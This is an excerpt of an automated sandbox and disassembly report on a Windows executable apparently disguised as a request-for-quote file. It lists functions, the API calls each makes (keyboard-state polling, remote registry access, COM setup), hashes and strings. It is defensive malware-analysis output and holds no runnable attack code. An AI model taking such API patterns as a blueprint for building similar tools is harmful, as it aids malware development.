                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                        • String ID:
                                                        • API String ID: 136442275-0
                                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                        APIs
                                                        • _wcsncpy.LIBCMT ref: 00467490
                                                        • _wcsncpy.LIBCMT ref: 004674BC
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • _wcstok.LIBCMT ref: 004674FF
                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                        • _wcstok.LIBCMT ref: 004675B2
                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                        • _wcslen.LIBCMT ref: 00467793
                                                        • _wcscpy.LIBCMT ref: 00467641
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • _wcslen.LIBCMT ref: 004677BD
                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                        • String ID: X
                                                        • API String ID: 3104067586-3081909835
                                                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                        • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                        Similarity
                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 440038798-2785691316
                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                        • _wcslen.LIBCMT ref: 004610A3
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                        • String ID: ThumbnailClass
                                                        • API String ID: 4136854206-1241985126
                                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                        APIs
                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                        Strings
                                                        Similarity
                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                        • String ID: 2
                                                        • API String ID: 1331449709-450215437
                                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                        • __swprintf.LIBCMT ref: 00460915
                                                        • __swprintf.LIBCMT ref: 0046092D
                                                        • _wprintf.LIBCMT ref: 004609E1
                                                        Strings
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                        • API String ID: 3054410614-2561132961
                                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                        APIs
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                        Strings
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 600699880-22481851
                                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: DestroyWindow
                                                        • String ID: static
                                                        • API String ID: 3375834691-2160076837
                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                        • API String ID: 2907320926-3566645568
                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                        APIs
                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                        • DeleteObject.GDI32(00580000), ref: 00470A04
                                                        • DestroyIcon.USER32(00500000), ref: 00470A1C
                                                        • DeleteObject.GDI32(94177D6D), ref: 00470A34
                                                        • DestroyWindow.USER32(0049006F), ref: 00470A4C
                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                        Similarity
                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 1237572874-0
                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                        Similarity
                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                        • String ID:
                                                        • API String ID: 3413494760-0
                                                        • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                        • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                        Similarity
                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                        • String ID: AU3_FreeVar
                                                        • API String ID: 2634073740-771828931
                                                        • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                        • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                        APIs
                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                        Similarity
                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 2294789929-1287834457
                                                        • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                        • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                        APIs
                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                        Similarity
                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                        • API String ID: 2483343779-2107944366
                                                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                        • _wcslen.LIBCMT ref: 00450720
                                                        • _wcscat.LIBCMT ref: 00450733
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                        • String ID: -----$SysListView32
                                                        • API String ID: 4008455318-3975388722
                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                        • GetParent.USER32 ref: 00469C98
                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                        • GetParent.USER32 ref: 00469CBC
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 2360848162-1403004172
                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                        Similarity
                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                        • String ID:
                                                        • API String ID: 262282135-0
                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        APIs
                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                        • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                        • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                        Similarity
                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                        • String ID:
                                                        • API String ID: 3771399671-0
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 0-1603158881
                                                        APIs
                                                        • CreateMenu.USER32 ref: 00448603
                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                        • IsMenu.USER32(?), ref: 004486AB
                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                        Strings
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                        • String ID: 0
                                                        • API String ID: 161812096-4108050209
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe), ref: 00434057
                                                        • LoadStringW.USER32(00000000), ref: 00434060
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                        • LoadStringW.USER32(00000000), ref: 00434078
                                                        • _wprintf.LIBCMT ref: 004340A1
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                        • C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, xrefs: 00434040
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 3648134473-451871060
                                                        APIs
                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,0040F545,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,004A90E8,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,?,0040F545), ref: 0041013C
                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                        Similarity
                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                        • String ID:
                                                        • API String ID: 978794511-0
                                                        APIs
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _memmove$_memcmp
                                                        • String ID: '$\$h
                                                        • API String ID: 2205784470-1303700344
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                        Strings
                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                        Similarity
                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                        • API String ID: 2441338619-1568723262
                                                        APIs
                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                        Strings
                                                        Memory Dump Source
